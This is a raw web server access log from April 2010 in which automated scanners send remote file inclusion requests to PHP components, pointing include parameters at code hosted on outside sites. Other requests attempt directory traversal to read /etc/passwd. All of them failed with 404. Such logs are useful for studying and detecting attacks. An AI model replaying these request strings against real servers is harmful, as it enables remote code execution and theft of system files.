89.252.252.21 - - [16/Apr/2010:04:53:56 -0500] "GET /logs/access_log.1265760000/index2.php?option=com_content&task=§ionid=&id=&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:04:59:57 -0500] "GET //errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:04:59:57 -0500] "GET /logs/access_log.1268265600//errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:04:59:57 -0500] "GET /logs//errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:05:03:12 -0500] "GET /logs/access_log.1268265600%20%20//errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.244.236.248 - - [16/Apr/2010:05:03:21 -0500] "GET /logs/access_log.1268265600%20%20//errors.php?error=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 324 "-""Mozilla/5.0"
124.120.3.95 - - [16/Apr/2010:05:06:08 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
124.120.3.95 - - [16/Apr/2010:05:06:09 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
124.120.3.95 - - [16/Apr/2010:05:06:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5"
189.78.119.115 - - [16/Apr/2010:05:06:17 -0500] "GET /logs/access_log.1219708800//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
189.78.119.115 - - [16/Apr/2010:05:06:23 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
189.78.119.115 - - [16/Apr/2010:05:06:30 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
203.19.4.18 - - [16/Apr/2010:05:07:02 -0500] "GET /logs/access_log.1212969600//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
207.46.13.144 - - [16/Apr/2010:05:09:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.144 - - [16/Apr/2010:05:10:42 -0500] "GET /logs/access_log.1215648000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.149.214.226 - - [16/Apr/2010:05:11:00 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
65.60.20.242 - - [16/Apr/2010:05:11:13 -0500] "GET /header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.149.214.226 - - [16/Apr/2010:05:11:13 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
75.149.214.226 - - [16/Apr/2010:05:12:02 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
75.149.214.226 - - [16/Apr/2010:05:12:08 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
65.60.20.242 - - [16/Apr/2010:05:12:31 -0500] "GET /logs/access_log.1270598400/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
65.60.20.242 - - [16/Apr/2010:05:12:31 -0500] "GET /header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
65.60.20.242 - - [16/Apr/2010:05:12:31 -0500] "GET /logs/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
65.60.20.242 - - [16/Apr/2010:05:12:52 -0500] "GET /logs/access_log.1270684800/header.php?tpl_pgb_moddir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
75.149.214.226 - - [16/Apr/2010:05:14:08 -0500] "GET /logs/access_log.1232755200//modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
75.149.214.226 - - [16/Apr/2010:05:14:08 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
75.149.214.226 - - [16/Apr/2010:05:14:08 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
195.162.19.197 - - [16/Apr/2010:05:24:30 -0500] "GET //com_colophon/colophon.php?mosConfig_absolute_path=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
116.122.36.61 - - [16/Apr/2010:05:24:41 -0500] "GET /logs//bbs2006/skin/happycast_category/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:05:24:41 -0500] "GET //bbs2006/skin/happycast_category/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:05:24:45 -0500] "GET /logs/access_log.1258934400//bbs2006/skin/happycast_category/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.162.19.197 - - [16/Apr/2010:05:26:09 -0500] "GET //com_colophon/colophon.php?mosConfig_absolute_path=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
195.162.19.197 - - [16/Apr/2010:05:26:41 -0500] "GET //com_colophon/colophon.php?mosConfig_absolute_path=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
195.162.19.197 - - [16/Apr/2010:05:26:42 -0500] "GET //com_colophon/colophon.php?mosConfig_absolute_path=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
81.25.68.146 - - [16/Apr/2010:05:27:05 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:27:05 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:27:05 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:27:17 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:27:18 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:27:18 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:27:18 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:27:18 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:27:21 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
75.149.214.226 - - [16/Apr/2010:05:30:05 -0500] "GET /logs/access_log.1270598400//modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
75.149.214.226 - - [16/Apr/2010:05:30:05 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
75.149.214.226 - - [16/Apr/2010:05:30:05 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
174.121.24.1 - - [16/Apr/2010:05:31:51 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:05:31:51 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:05:31:51 -0500] "GET /logs/access_log.1219708800%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:05:32:00 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:05:32:00 -0500] "GET /logs/access_log.1219708800%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:05:32:00 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
75.149.214.226 - - [16/Apr/2010:05:32:33 -0500] "GET /logs/access_log.1219708800//modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
207.46.199.183 - - [16/Apr/2010:05:33:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.247.178.106 - - [16/Apr/2010:05:34:37 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:05:34:37 -0500] "GET /logs/access_log.1219708800%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:05:34:37 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:35:06 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:35:06 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:35:09 -0500] "GET /logs/access_log.1220054400%20%20/convert/mvcw.php?step=1&vwar_root=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:35:17 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:35:19 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:35:21 -0500] "GET /logs/access_log.1220054400%20%20/convert/mvcw.php?step=1&vwar_root=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:37:03 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:37:04 -0500] "GET /logs/access_log.1220054400%20%20/convert/mvcw.php?step=1&vwar_root=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:37:08 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
66.244.236.248 - - [16/Apr/2010:05:38:25 -0500] "GET /logs/access_log.1219708800%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 341 "-""Mozilla/5.0"
66.244.236.248 - - [16/Apr/2010:05:38:25 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.244.236.248 - - [16/Apr/2010:05:38:25 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 317 "-""Mozilla/5.0"
75.149.214.226 - - [16/Apr/2010:05:39:30 -0500] "GET /logs/access_log.1270598400//modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
75.149.214.226 - - [16/Apr/2010:05:39:30 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
75.149.214.226 - - [16/Apr/2010:05:39:30 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
174.121.24.1 - - [16/Apr/2010:05:40:08 -0500] "GET /logs/access_log.1219708800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
75.149.214.226 - - [16/Apr/2010:05:41:59 -0500] "GET /logs/access_log.1219708800//modules/TotalCalendar/about.php?inc_dir=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
81.25.68.146 - - [16/Apr/2010:05:42:40 -0500] "GET /logs/access_log.1268265600//modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
94.247.178.106 - - [16/Apr/2010:05:43:03 -0500] "GET /logs/access_log.1219708800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:44:24 -0500] "GET /logs/access_log.1268265600//modules/TotalCalendar/about.php?inc_dir=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
66.244.236.248 - - [16/Apr/2010:05:46:53 -0500] "GET /logs/access_log.1219708800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.205.4.73 - - [16/Apr/2010:05:49:11 -0500] "GET /logs/access_log.1219708800//phpsecurityadmin/include/logout.php?PSA_PATH=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.205.4.73 - - [16/Apr/2010:05:49:11 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.205.4.73 - - [16/Apr/2010:05:49:11 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:05:49:53 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:05:49:53 -0500] "GET /logs/access_log.1270684800///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:05:49:53 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:05:49:57 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:05:49:57 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:05:49:57 -0500] "GET /logs/access_log.1270684800///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.205.4.73 - - [16/Apr/2010:05:50:41 -0500] "GET /logs/access_log.1212969600//phpsecurityadmin/include/logout.php?PSA_PATH=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:05:50:52 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:05:50:53 -0500] "GET /logs/access_log.1219708800//phpsecurityadmin/include/logout.php?PSA_PATH=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:05:50:53 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:05:52:17 -0500] "GET /logs/access_log.1220054400/convert/mvcw.php?step=1&vwar_root=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
212.241.251.224 - - [16/Apr/2010:05:54:18 -0500] "GET /logs/access_log.1214784000//phpsecurityadmin/include/logout.php?PSA_PATH=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.46.195.234 - - [16/Apr/2010:05:55:29 -0500] "GET /logs/access_log.1161129600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.78.119.115 - - [16/Apr/2010:05:55:33 -0500] "GET /logs/access_log.1210291200//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
189.78.119.115 - - [16/Apr/2010:05:55:39 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
189.78.119.115 - - [16/Apr/2010:05:55:46 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
207.46.199.37 - - [16/Apr/2010:05:55:59 -0500] "GET /logs/access_log.1159315200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.100 - - [16/Apr/2010:05:57:59 -0500] "GET /logs/access_log.1229558400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.162.19.197 - - [16/Apr/2010:06:00:49 -0500] "GET /logs/access_log.1232668800//com_colophon/colophon.php?mosConfig_absolute_path=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
195.162.19.197 - - [16/Apr/2010:06:00:59 -0500] "GET //com_colophon/colophon.php?mosConfig_absolute_path=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
195.162.19.197 - - [16/Apr/2010:06:00:59 -0500] "GET /logs//com_colophon/colophon.php?mosConfig_absolute_path=http://www.verbicide.ca/drivel//nucleus/xmlrpc/mimma.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
209.216.43.133 - - [16/Apr/2010:06:02:19 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:02:19 -0500] "GET /logs/access_log.1268611200%20%20///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:02:19 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:02:19 -0500] "GET /logs/access_log.1270684800%20%20///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:02:29 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:02:29 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:02:29 -0500] "GET /logs/access_log.1268611200%20%20///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:02:29 -0500] "GET /logs/access_log.1270684800%20%20///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:03:32 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:03:32 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:03:32 -0500] "GET /logs/access_log.1268611200///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:04:10 -0500] "GET /logs/access_log.1219363200%20%20/home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:04:12 -0500] "GET /home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:04:13 -0500] "GET /logs/home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:04:13 -0500] "GET /logs/access_log.1267920000%20%20/home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:04:23 -0500] "GET /logs/access_log.1219363200%20%20/home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:04:23 -0500] "GET /logs/home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:04:24 -0500] "GET /home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:04:24 -0500] "GET /logs/access_log.1267920000%20%20/home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:04:24 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:04:24 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.216.43.133 - - [16/Apr/2010:06:04:24 -0500] "GET /logs/access_log.1268611200///bbs///write_comment_update.php?board_skin_path=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:05:32 -0500] "GET /home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:05:39 -0500] "GET /logs/home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:05:39 -0500] "GET /logs/access_log.1219363200%20%20/home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.25.68.146 - - [16/Apr/2010:06:05:44 -0500] "GET /logs/access_log.1267920000%20%20/home.php?pagina=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:06:06:20 -0500] "GET ///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:06:06:20 -0500] "GET /logs/access_log.1219708800%20%20///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:06:07:04 -0500] "GET /logs/access_log.1220054400%20%20///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
